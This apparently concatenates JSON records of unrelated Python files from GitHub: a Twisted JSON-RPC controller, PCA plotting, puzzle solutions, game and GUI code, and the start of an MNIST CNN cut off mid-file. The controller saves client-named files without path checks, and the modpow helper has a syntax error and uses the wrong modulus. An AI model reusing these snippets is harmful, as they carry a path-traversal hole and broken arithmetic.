__get_variable(self, temp_id, comp_id, variable):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tconn.text_factory = str\n\t\t\tretcode = conn.execute(\"select ipsrc,sport from comps where temp_id = ? 
and comp_id = ?\", (temp_id, comp_id))\n\t\tnodes = [node for node in retcode]\n\t\tdeflist = [CompUtils.query(ip, port, 'read_variables', comp_id,variable) for ip,port in nodes]\n\t\td = defer.DeferredList(deflist,consumeErrors=1)\n\t\td.addCallback(self.__parse_get_variable)\n\t\treturn defer.DeferredList(deflist,consumeErrors=1)\n\n\tdef __write_variable(self, temp_id, comp_id, variable):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tconn.text_factory = str\n\t\t\tretcode = conn.execute(\"select ipsrc,sport from comps where temp_id = ? and comp_id = ?\", (temp_id, comp_id))\n\t\tnodes = [node for node in retcode]\n\t\tdeflist = [CompUtils.query(ip, port, 'write_variables', comp_id,variable) for ip,port in nodes]\n\t\td = defer.DeferredList(deflist,consumeErrors=1)\n\t\td.addCallback(self.__parse_get_variable)\n\t\treturn defer.DeferredList(deflist,consumeErrors=1)\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_get_variable(self, temp_id, comp_id, block_id, var_id):\n\t\t\"\"\"\\brief get the value of a variable\n\t\t\\param temp_id (\\c string) template instance ID\n\t\t\\param comp_id (\\c string) composition ID\n\t\t\\param block_id (\\c string) block ID\n\t\t\\param var_id (\\c string) variable ID\n\t\t\\return (\\c ReturnValue) The values (list[ReturnValue])\n\t\t\"\"\"\n\t\tlog.msg(\"received get_variable request\", system = self.__name)\n\t\tvariable = [ [ block_id, var_id, \"\", \"read\" ] ]\n\t\tretvals = yield self.__get_variable(temp_id, comp_id, variable)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS,None,retvals)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\n\t@defer.inlineCallbacks\n\tdef jsonrpc_write_variable(self, temp_id, comp_id, block_id, var_id, var_val):\n\t\t\"\"\"\\brief get the value of a variable\n\t\t\\param temp_id (\\c string) template instance ID\n\t\t\\param comp_id (\\c string) composition ID\n\t\t\\param block_id (\\c string) block ID\n\t\t\\param var_id (\\c string) variable ID\n\t\t\\param var_val (\\c string) value 
to assign to the variable ID\n\t\t\\return (\\c ReturnValue) The values (list[ReturnValue])\n\t\t\"\"\"\n\t\tlog.msg(\"received write_variable request\", system = self.__name)\n\t\tvariable = jsonpickle.encode([VariableInfo(block_id, var_id, \"\", \"write\", var_val)])\n\t\tretvals = yield self.__write_variable(temp_id, comp_id, variable)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS,None,retvals)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t#########################\n\t# JSONRPC: GENERAL INFO #\n\t#########################\n\n\tdef __get_blocks_list(self):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tretcode = conn.execute(\"select distinct name from blocks\")\n\t\treturn [row[0] for row in retcode]\n\n\tdef __get_blocks_info(self, block_types):\n\t\tblock_infos = []\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tfor name in block_types:\n\t\t\t\tretcode = conn.execute(\"select distinct info from blocks where name = ?\", (name,))\n\t\t\t\ttry: info = retcode.fetchone()[0]\n\t\t\t\texcept TypeError: info = \"no info available\"\n\t\t\t\tblock_infos.append(info)\n\t\treturn [cPickle.loads(str(b)) for b in block_infos]\n\n\tdef __save_datafile(self, fname, databin):\n\t\timport base64\n\t\tdata = base64.b64decode(databin)\n\t\tf = open(self.__datafile_dir +'/'+fname,'w')\n\t\ttry: f.write(data)\n\t\texcept: return RetVal.CODE_FAILURE\n\t\tf.close()\n\t\treturn RetVal.CODE_SUCCESS\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_get_supported_blocks(self):\n\t\t\"\"\"\\brief return the list of supported blocks,\n\t\t\\return (\\c ReturnValue) The list of blocks (list[string])\n\t\t\"\"\"\n\t\tlog.msg(\"received get_supported_blocks request\", system = self.__name)\n\t\tblocks = yield threads.deferToThread(self.__get_blocks_list)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"supported blocks\", blocks)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_get_block_infos(self, block_types):\n\t\t\"\"\"\\brief 
return the info about the given set of blocks,\n\t\t\\param (\\c list[string]) block_types the block types (e.g., [\"PFQSource\"]\n\t\t\\return (\\c ReturnValue) The information (list[BlockInfo])\n\t\t\"\"\"\n\t\tlog.msg(\"received get_blocks_info request\", system = self.__name)\n\t\tblock_infos = yield threads.deferToThread(self.__get_blocks_info, block_types)\n\t\tmsg = \"block infos\"\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, msg, block_infos)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\tdef jsonrpc_get_supported_topologies(self):\n\t\t\"\"\"\\brief return the list of supported topology\n\t\t\\return (\\c ReturnValue) The list of supported topologies\n\t\t\"\"\"\n\t\tlog.msg(\"received get_supported_topology request\", system = self.__name)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"supported topologies\", Topology.TOPO_TYPES)\n\t\treturn jsonpickle.encode(r)\n\t\n\t@defer.inlineCallbacks\n\tdef jsonrpc_save_datafile(self, fname, databin):\n\t\t\"\"\"\\brief receive the datafile to send to nodes\n\t\t\\param fname (\\c string) file name\n\t\t\\param databin (\\c base64) b64 encoded file\n\t\t\\return (\\c ReturnValue) Value is empty\n\t\t\"\"\"\n\t\tlog.msg(\"received save_datafile request\", system = self.__name)\n\t\tretcode = yield threads.deferToThread(self.__save_datafile,fname,databin)\n\t\tr = ReturnValue(ReturnValue.CODE_FAILURE, \"cannot save datafile\", None)\n\t\tif retcode == RetVal.CODE_SUCCESS:\n\t\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"datafile saved successfully\", None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n","repo_name":"mdusi/blockmon-controller","sub_path":"twisted/plugins/core/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":15866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"12996515546","text":"'''\nThis file originally came from 
https://github.com/eriklindernoren/ML-From-Scratch/blob/master/unsupervised_learning/principal_component_analysis.py\nIt has been adapted a lot and most of the original was removed. This file is basically used only for the Transform method.\n'''\n\nimport sys\nimport os\nfrom sklearn import datasets\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\ndir_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, dir_path + \"/../utils\")\nfrom data_operation import calculate_covariance_matrix\nfrom data_operation import calculate_correlation_matrix\nfrom data_manipulation import standardize\n\nredPatch = mpatches.Patch(color='red', label='Hinge movement')\ngreenPatch = mpatches.Patch(color='green', label='Pendulum movement')\n \ngraphLegend = [greenPatch, redPatch]\n\nclass PCA():\n def __init__(self): pass\n\n \n\n def plotInNd(self, features, X, y = None):\n n = len(features)\n X_transformed = self.transform(X, n_components = max(features)+1)\n \n # Another option is to loop and plot a single feature at a time and show at the end?\n \n for i in range(n):\n \n pass\n \n \n if n == 3:\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n x1 = X_transformed[:, features[0]]\n x2 = X_transformed[:, features[1]]\n x3 = X_transformed[:, features[2]]\n ax.scatter(x1, x2, x3, c=y)\n else:\n x1 = X_transformed[:, features[0]]\n x2 = X_transformed[:, features[1]]\n plt.scatter(x1, x2, c=y)\n plt.show()\n \n # Plot the dataset X and the corresponding labels y in 2D using PCA.\n def plot_in_2d(self, X, y=None, labels = []):\n X_transformed = self.transform(X, n_components=2)\n x1 = X_transformed[:, 0]\n x2 = X_transformed[:, 1]\n plt.scatter(x1, x2, c=y)\n# plt.title(labels[0])\n# plt.xlabel(labels[1])\n# plt.ylabel(labels[2])\n# plt.legend(handles = graphLegend)\n plt.show()\n\n # Plot the dataset X and the corresponding labels y in 3D using PCA.\n def plot_in_3d(self, 
X, y=None, labels = []):\n X_transformed = self.transform(X, n_components=3)\n x1 = X_transformed[:, 0]\n x2 = X_transformed[:, 1]\n x3 = X_transformed[:, 2]\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(x1, x2, x3, c=y)\n# plt.title(labels[0])\n# plt.xlabel(labels[1])\n# plt.ylabel(labels[2])\n \n # Do I add the \n \n plt.show()\n\n # Fit the dataset to the number of principal components\n # specified in the constructor and return the transform dataset\n def transform(self, X, n_components):\n covariance = calculate_covariance_matrix(X)\n \n # Get the eigenvalues and eigenvectors.\n # (eigenvector[:,0] corresponds to eigenvalue[0])\n eigenvalues, eigenvectors = np.linalg.eig(covariance)\n \n # Sort the eigenvalues and corresponding eigenvectors from largest\n # to smallest eigenvalue and select the first n_components\n idx = eigenvalues.argsort()[::-1]\n eigenvalues = eigenvalues[idx][:n_components]\n eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :n_components]\n \n # Project the data onto principal components\n X_transformed = X.dot(eigenvectors)\n \n return X_transformed\n\ndef main():\n # Load the dataset\n data = datasets.load_iris()\n X = data.data\n y = data.target\n\n # Project the data onto the 2 primary principal components and plot the\n # data\n pca = PCA()\n# pca.plot_in_3d(X, y, ['','',''])\n pca.plot_in_3d( X, y, ['','',''])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"matt123miller/Learning-Python-ML","sub_path":"FYP/principal_component_analysis.py","file_name":"principal_component_analysis.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36635880468","text":"def part2(lanterns):\n fishes = [0] * 9\n\n for x in lanterns:\n fishes[x] += 1\n\n for x in range(256):\n fishes = fishes[1:] + fishes[:1]\n fishes[6] += fishes[8]\n\n return sum(fishes)\n\n\ndef part1(lanterns):\n days = 0\n\n while 
days != 80:\n x = 0\n length = len(lanterns)\n\n while x < length:\n if lanterns[x] == 0:\n lanterns[x] = 6\n lanterns.append(8)\n x += 1\n \n else:\n lanterns[x] -= 1\n x += 1\n \n days += 1\n\n return len(lanterns)\n\n\ndef main():\n with open('F - inputs.txt') as f:\n lanterns = list(map(int, f.read().split(',')))\n print(f'PART 1 - {part1(lanterns)}')\n\n with open('F - inputs.txt') as f:\n lanterns = list(map(int, f.read().split(',')))\n print(f'PART 2 - {part2(lanterns)}')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JaViLuMa/AdventOfCode2021","sub_path":"F - Advent - 6.py","file_name":"F - Advent - 6.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40411723178","text":"from small_text.classifiers.factories import AbstractClassifierFactory\nfrom small_text.integrations.transformers.classifiers.classification import \\\n TransformerBasedClassification\nfrom small_text.integrations.transformers.classifiers.setfit import SetFitClassification\n\n\nclass TransformerBasedClassificationFactory(AbstractClassifierFactory):\n\n def __init__(self, transformer_model_args, num_classes, kwargs={}):\n \"\"\"\n Parameters\n ----------\n transformer_model_args : TransformerModelArguments\n Name of the sentence transformer model.\n num_classes : int\n Number of classes.\n kwargs : dict\n Keyword arguments which will be passed to `TransformerBasedClassification`.\n \"\"\"\n self.transformer_model_args = transformer_model_args\n self.num_classes = num_classes\n self.kwargs = kwargs\n\n def new(self):\n \"\"\"Creates a new TransformerBasedClassification instance.\n\n Returns\n -------\n classifier : TransformerBasedClassification\n A new instance of TransformerBasedClassification which is initialized with the given keyword args `kwargs`.\n \"\"\"\n return TransformerBasedClassification(self.transformer_model_args,\n self.num_classes,\n **self.kwargs)\n\n\nclass 
SetFitClassificationFactory(AbstractClassifierFactory):\n \"\"\"\n .. versionadded:: 1.2.0\n \"\"\"\n\n def __init__(self, setfit_model_args, num_classes, classification_kwargs={}):\n \"\"\"\n Parameters\n ----------\n setfit_model_args : SetFitModelArguments\n Name of the sentence transformer model.\n num_classes : int\n Number of classes.\n classification_kwargs : dict\n Keyword arguments which will be passed to `SetFitClassification`.\n \"\"\"\n self.setfit_model_args = setfit_model_args\n self.num_classes = num_classes\n self.classification_kwargs = classification_kwargs\n\n def new(self):\n \"\"\"Creates a new SetFitClassification instance.\n\n Returns\n -------\n classifier : SetFitClassification\n A new instance of SetFitClassification which is initialized with the given keyword args `kwargs`.\n \"\"\"\n return SetFitClassification(self.setfit_model_args,\n self.num_classes,\n **self.classification_kwargs)\n","repo_name":"webis-de/small-text","sub_path":"small_text/integrations/transformers/classifiers/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":503,"dataset":"github-code","pt":"44"} +{"seq_id":"34924747078","text":"\"\"\"Maintains various parameters used in the game, such as the number of players and number of coins per player.\"\"\"\n\nfrom typing import NoReturn\nfrom coup.agents import *\n\nclass Config:\n \"\"\"The class storing all the config parameters.\"\"\"\n def __init__(self, **kwargs) -> None:\n self.n_players = 2\n self.local_ais = {}\n self.nonlocal_ais = {}\n\n # self.local_ais = {0: KerasAgent(load=True, training=True, debug=False),\n # 1: KerasAgent(load=True, training=False, debug=False)}\n\n self.cards_per_player = 2\n self.cards_per_character = 3\n self.starting_coins = 2\n self.penalize_first_player_in_2p_game = True\n self.first_player_coin_penalty = 1\n\n self.reaction_choice_mode = \"random_challenge\"\n\n self.mandatory_coup_threshold 
= 10\n\n self.n_cards_for_exchange = 2\n\n self.pay_on_successful_challenges = False\n\n self.engine_sleep_duration = 0.5\n\n self.verbose = 0\n\n # Set initial hands for each player\n self.starting_hands = None\n #self.starting_hands = {0: [\"Contessa\", \"Contessa\"],\n # 1: [\"Captain\", \"Ambassador\"]}\n\n # Set deck characters\n self.deck_configuration = None\n# self.deck_configuration = {\"Ambassador\": 0,\n# \"Assassin\": 0,\n# \"Captain\": 0,\n# \"Contessa\": 0,\n# \"Duke\": 9}\n\n\n # initialize other parameters\n for key, value in kwargs.items():\n self.__setattr__(key, value)\n\n if self.local_ais:\n self.n_players = len(self.local_ais)\n\n self.validate_args()\n\n def validate_args(self) -> NoReturn:\n \"\"\"Ensure that the starting arguments give a valid configuration.\"\"\"\n\n # Make sure that there are enough cards in the deck for the settings\n max_cards_in_use = self.n_players * self.cards_per_player + self.n_cards_for_exchange\n cards_in_deck = self.cards_per_character * 5\n if max_cards_in_use > cards_in_deck:\n raise ValueError(\"Not enough cards to play given game settings\")\n\n # Ensure first player penalty in 2p games is not greater than starting coins\n if self.n_players == 2 and self.penalize_first_player_in_2p_game:\n if self.first_player_coin_penalty > self.starting_coins:\n raise ValueError(\"First player penalty is greater than number of starting coins\")\n\n # Ensure reaction choice mode is valid\n if self.reaction_choice_mode not in [\"first\", \"random\", \"first_block\", \"first_challenge\", \"random_block\", \"random_challenge\"]:\n raise ValueError(\"Invalid reaction choice mode: {}\".format(self.reaction_choice_mode))\n\n # Ensure starting hand configuration is valid\n # Ensure all hands have the same length\n if self.starting_hands:\n assert len(set([len(self.starting_hands[i]) for i in self.starting_hands])) == 1\n assert self.n_players == len(self.starting_hands)\n\n def __str__(self) -> str:\n \"\"\"Nicely print all the 
game settings.\"\"\"\n rep = \"\\nGame settings:\\n\\n\"\n settings = vars(self)\n for v in settings:\n rep += \"{}: {}\\n\".format(v, settings[v])\n return rep\n","repo_name":"wes1350/Coup","sub_path":"coup/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23779689897","text":"from matplotlib import pyplot as plt, rc\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\n\r\ndef angle_cos(p0, p1, p2):\r\n d1, d2 = (p0 - p1).astype('float'), (p2 - p1).astype('float')\r\n return abs(np.dot(d1, d2) / np.sqrt(np.dot(d1, d1) * np.dot(d2, d2)))\r\n\r\n\r\ndef distance(p1, p2):\r\n return np.sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)\r\n\r\n\r\nclass Picture:\r\n def __init__(self, filename):\r\n self.filename = filename\r\n self.img = cv.imread(filename)\r\n self.img_gray = cv.cvtColor(self.img, cv.COLOR_BGR2GRAY)\r\n\r\n height, width, channels = self.img.shape\r\n self.height = height\r\n self.width = width\r\n\r\n self.kernel = np.ones((3, 3), np.uint8)\r\n\r\n def process_picture(self):\r\n squares = self.find_faces()\r\n faces = []\r\n for square in squares:\r\n min_x, min_y = np.min(square[:, 0]), np.min(square[:, 1])\r\n max_x, max_y = np.max(square[:, 0]), np.max(square[:, 1])\r\n crop_img = self.img_gray[min_y:max_y, min_x:max_x]\r\n pips = self.find_pips(crop_img)\r\n if len(pips) > 0:\r\n faces.append(square)\r\n textcoord = (int((max_x+min_x)/2), int(min_y - 10))\r\n cv.putText(self.img, str(len(pips)), textcoord, cv.FONT_HERSHEY_COMPLEX, 10, (255, 0, 0), 7)\r\n\r\n cv.drawContours(self.img, faces, -1, (0, 0, 255), 10)\r\n plt.figure(figsize=(6, 6))\r\n plt.imshow(self.img)\r\n plt.show()\r\n\r\n def find_faces(self):\r\n squares = []\r\n blur = cv.medianBlur(self.img_gray, 5)\r\n for thresh in range(255, 0, -15):\r\n _retr, binary = cv.threshold(blur, thresh, 255, cv.THRESH_BINARY)\r\n contours, _hierarchy = 
cv.findContours(binary, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\r\n\r\n for cnt in contours:\r\n cnt_len = cv.arcLength(cnt, True)\r\n cnt = cv.approxPolyDP(cnt, 0.02 * cnt_len, True)\r\n\r\n if 4 <= len(cnt) <= 6 and 0.005 * (self.height * self.width) < cv.contourArea(cnt) < 0.1 * \\\r\n (self.height * self.width) and cv.isContourConvex(cnt):\r\n rect = cv.minAreaRect(cnt)\r\n (x, y), (width, height), angle = rect\r\n aspect_ratio = min(width, height) / max(width, height)\r\n if aspect_ratio > 0.88:\r\n box = cv.boxPoints(rect)\r\n box = np.int0(box)\r\n squares.append(box)\r\n\r\n mass_centers = []\r\n for square in squares:\r\n m = cv.moments(square)\r\n mass_centers.append((m['m10'] / m['m00'], m['m01'] / m['m00']))\r\n\r\n indexes = []\r\n for i in range(len(mass_centers)):\r\n add = True\r\n for j in range(i - 1, -1, -1):\r\n if distance(mass_centers[i], mass_centers[j]) < 100:\r\n add = False\r\n if add:\r\n indexes.append(i)\r\n\r\n return [squares[i] for i in indexes]\r\n\r\n def find_pips(self, crop_img):\r\n crop_img = cv.GaussianBlur(crop_img, (5, 5), 0)\r\n\r\n params = cv.SimpleBlobDetector_Params()\r\n\r\n params.minThreshold = 0\r\n params.maxThreshold = 255\r\n\r\n params.filterByArea = True\r\n params.minArea = 150\r\n params.maxArea = 35000\r\n\r\n params.filterByCircularity = True\r\n params.minCircularity = 0.4\r\n\r\n params.filterByInertia = True\r\n params.minInertiaRatio = 0.6\r\n\r\n params.filterByConvexity = True\r\n params.minConvexity = 0.3\r\n\r\n detector = cv.SimpleBlobDetector_create(params)\r\n keypoints = detector.detect(crop_img)\r\n\r\n '''im_with_keypoints = cv.drawKeypoints(crop_img, keypoints, np.array([]), (0, 0, 255), cv.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\r\n\r\n plt.figure(figsize=(6, 6))\r\n plt.imshow(im_with_keypoints)\r\n plt.show()'''\r\n\r\n return 
keypoints\r\n","repo_name":"tomek-jankowiak/Dice_Detector","sub_path":"Picture.py","file_name":"Picture.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39374655374","text":"from run_game import game_choose_word, play_game, player_choose_word\nfrom os import system\n\ndef menu():\n print(\"\"\" MENU\n 1. Single Player\n 2. Multi Player\n x. Exit\\n\\n\"\"\")\n return input(\"Select an option: \")\n\ndef single_player():\n print(\"You're playing by yourself\")\n word = game_choose_word()\n winner = play_game(word)\n if winner == 0:\n print(\"You lost :(\\nThe word was\", word)\n else:\n print(\"You won!!!\")\n\ndef multi_player():\n print(\"You're playing with a friend\")\n word = player_choose_word()\n system(\"cls\")\n winner = play_game(word)\n if winner == 0:\n print(\"The chooser won!!\")\n else:\n print(\"The guesser won!!\")\n\ndef invalid():\n print(\"You have entered an invalid key.\\nPlease select an option from the menu\")","repo_name":"zangdi/hangman","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27963957996","text":"def modpow(a, b, m):\n p = a, res = 1\n for i in range(30):\n if b & (1 << i) != 0:\n res *= p\n res %= p\n p *= p\n p %= m\n return res\n\n# a / b を返す関数\ndef division(a, b, m):\n return (a * modpow(b, m - 2, m)) % m","repo_name":"tonko2/AtCoder","sub_path":"Libraries/division.py","file_name":"division.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1391196497","text":"'''\nCreated on Dec 19, 2014\n\n@author: ericrudisill\n'''\nfrom ui.MainWindow import Ui_MainWindow\nfrom PyQt4 import QtCore, QtGui\nfrom MacListWidget import MacListWidget\nfrom BsClient import BsClient\nfrom Device 
import Device\nfrom PlotWindow import PlotWindow\n\nclass MainWindow(QtGui.QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setupUi(self)\n \n # Docking layout preferences\n self.setCorner( QtCore.Qt.TopLeftCorner , QtCore.Qt.LeftDockWidgetArea );\n self.setCorner( QtCore.Qt.TopRightCorner, QtCore.Qt.RightDockWidgetArea );\n self.setCorner( QtCore.Qt.BottomLeftCorner, QtCore.Qt.LeftDockWidgetArea );\n self.setCorner( QtCore.Qt.BottomRightCorner, QtCore.Qt.RightDockWidgetArea );\n \n # Sexxy\n # http://stackoverflow.com/questions/14330642/how-do-i-achieve-consistent-highlighting-of-qlistwidget-items-across-widget-stat\n self.setStyleSheet('''\n QListWidget:item:selected:active { background: lightblue }\n ''')\n \n # Mdi\n self.mdiArea.subWindowActivated.connect(self.subWindowActivated)\n self.mdiChildNumber = 0\n \n # Device List\n #self.listWidget.itemActivated.connect(self.deviceActivated)\n #self.listWidget.itemSelectionChanged.connect(self.deviceSelected)\n self.checkSelectAll.stateChanged.connect(self.checkSelectAllStateChanged)\n \n # Menu hookups\n self.actionRSSI_Histogram.triggered.connect(self.createRSSIHistogram)\n \n # Internal structures\n self.devices = []\n \n # Attach to the server\n self.clientThread = BsClient(BsClient.HOST, BsClient.PORT)\n self.clientThread.received.connect(self.updateMacList)\n self.clientThread.start()\n \n def updateMacList(self, record):\n try:\n device = next(d for d in self.devices if d.mac == record.mac)\n except Exception:\n # no record found, so create one as well as a widget\n device = Device()\n device.mac = record.mac\n self.devices.append(device)\n w = MacListWidget(device)\n w.activeStateChanged.connect(self.deviceActiveStateChanged)\n wi = QtGui.QListWidgetItem(self.listWidget)\n wi.setSizeHint(w.sizeHint())\n self.listWidget.addItem(wi)\n self.listWidget.setItemWidget(wi, w)\n \n device.rssi = record.rssi_dec\n device.batt = record.batt\n device.count = device.count + 
1\n device.update()\n \n def getActiveDevices(self):\n i = 0\n devices = []\n while i < self.listWidget.count():\n item = self.listWidget.item(i)\n w = self.listWidget.itemWidget(item)\n if w.isActive():\n devices.append(w.device)\n i = i + 1\n return devices\n \n def subWindowActivated(self, window): \n try:\n i = 0\n while i < self.listWidget.count():\n item = self.listWidget.item(i)\n w = self.listWidget.itemWidget(item)\n if w.device in window.widget().devices:\n w.setActiveState(QtCore.Qt.Checked, cancelEmit=True)\n else:\n w.setActiveState(QtCore.Qt.Unchecked, cancelEmit=True)\n i = i + 1\n \n except Exception:\n # sometimes window is nothing...why?\n pass\n \n def checkSelectAllStateChanged(self, newState):\n i = 0\n while i < self.listWidget.count():\n item = self.listWidget.item(i)\n w = self.listWidget.itemWidget(item)\n w.setActiveState(newState)\n i = i + 1\n \n def deviceActiveStateChanged(self, newState, device):\n w = self.mdiArea.activeSubWindow()\n if not w is None:\n if newState == QtCore.Qt.Unchecked:\n w.widget().removeDevice(device)\n else:\n w.widget().addDevice(device)\n \n \n def createRSSIHistogram(self):\n d = self.getActiveDevices()\n child = PlotWindow(devices=d)\n sub = self.mdiArea.addSubWindow(child)\n sub.setWindowTitle(\"RSSI Histogram \" + str(self.mdiChildNumber))\n self.mdiChildNumber = self.mdiChildNumber + 1\n child.showMaximized()\n \n# def deviceActivated(self, item):\n# print \"Activated \" + str(item)\n# print \"Widget: \" + self.listWidget.itemWidget(item).device.mac\n# \n# def deviceSelected(self):\n# item = self.listWidget.currentItem()\n# print \"Selected \" + str(item)\n# print \"Widget: \" + self.listWidget.itemWidget(item).device.mac \n ","repo_name":"erudisill/bitstorm-workbench","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22966107286","text":"import 
click\n\nfrom ens.console import echo\nfrom ens.merge import merge, edit\nfrom ens.remote import get_remote\nfrom ens.utils.click import arg_novel, opt_filter\n\n\n@click.group()\ndef utils():\n pass\n\n\n@utils.command('novel')\n@arg_novel\ndef func(novel):\n \"\"\"\n 测试 novel 的解析结果\n \"\"\"\n echo(novel)\n\n\n@utils.command('filter')\n@opt_filter\ndef func(filter):\n \"\"\"\n 测试 filter 的解析结果\n \"\"\"\n echo(filter)\n\n\n@utils.command('merge')\n@click.argument('text1')\n@click.argument('text2')\ndef func(text1, text2):\n \"\"\"\n 测试 merge\n \"\"\"\n echo(merge(text1, text2))\n\n\n@utils.command('edit')\n@click.argument('text')\ndef func(text):\n \"\"\"\n 测试 edit\n \"\"\"\n echo(edit(text))\n\n\n@utils.command('catalog')\n@arg_novel\ndef func(novel):\n remote = get_remote(novel.remote)\n cat = remote.get_catalog(novel.nid)\n print(cat.dump())\n\n\n@utils.command('chapter')\n@arg_novel\n@click.argument('cid')\ndef func(novel, cid):\n remote = get_remote(novel.remote)\n text = remote.get_content(novel.nid, cid)\n print(text)\n","repo_name":"syrinka/Elegant-Novel-Spider","sub_path":"ens/commands/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17294680847","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index),\n path('list', views.listTask),\n path('add', views.addTask),\n path('editForm/', views.editForm),\n path('/', views.task, name=\"task\"),\n path('deleteTask/', views.delete)\n]","repo_name":"Gveideon/django_web_project","sub_path":"project_task/taskApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73736534532","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torchvision.datasets import MNIST\r\nfrom torchvision.transforms import ToTensor\r\nfrom torch.utils.data import DataLoader\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport os\r\n\r\nclass CNN(nn.Module): # CNN 클래스 정의 및 nn.Module 클래스를 상속\r\n def __init__(self):\r\n super(CNN, self).__init__() # nn.Module 클래스에 있는 __init__() 메소드를 실행.\r\n self.input_layer = nn.Conv2d(in_channels=1, out_channels=16, kernel_size=3, padding=1) # 16x28x28\r\n self.layer_1 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1, stride=2) # 32x14x14\r\n self.layer_2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1, stride=2) # 64x7x7\r\n self.layer_3 = nn.AdaptiveAvgPool2d((1, 1)) # 64x1x1\r\n self.layer_4 = nn.Linear(in_features=64, out_features=10) # 10\r\n\r\n def forward(self, x):\r\n x1 = F.relu(self.input_layer(x)) # 16x28x28\r\n x2 = F.relu(self.layer_1(x1)) # 32x14x14\r\n x3 = F.relu(self.layer_2(x2)) # 64x7x7\r\n x4 = self.layer_3(x3) # Bx64x1x1\r\n x5 = x4.view(x4.shape[0], 64) # x4.shape : Bx64x1x1 >> Bx64 *squeeze 1x64x1x1 >> 64\r\n output = self.layer_4(x5) # Bx10\r\n return output\r\n\r\nif __name__ == '__main__': # 이 파일을 직접 실행할때만 True값 리턴\r\n dataset = MNIST(root='./datasets', train=True, transform=ToTensor(), download=True) # MNIST 데이터셋 다운로드\r\n data_loader = DataLoader(dataset, batch_size=32, shuffle=True) #pytorch DataLoader 모듈 이용하여 
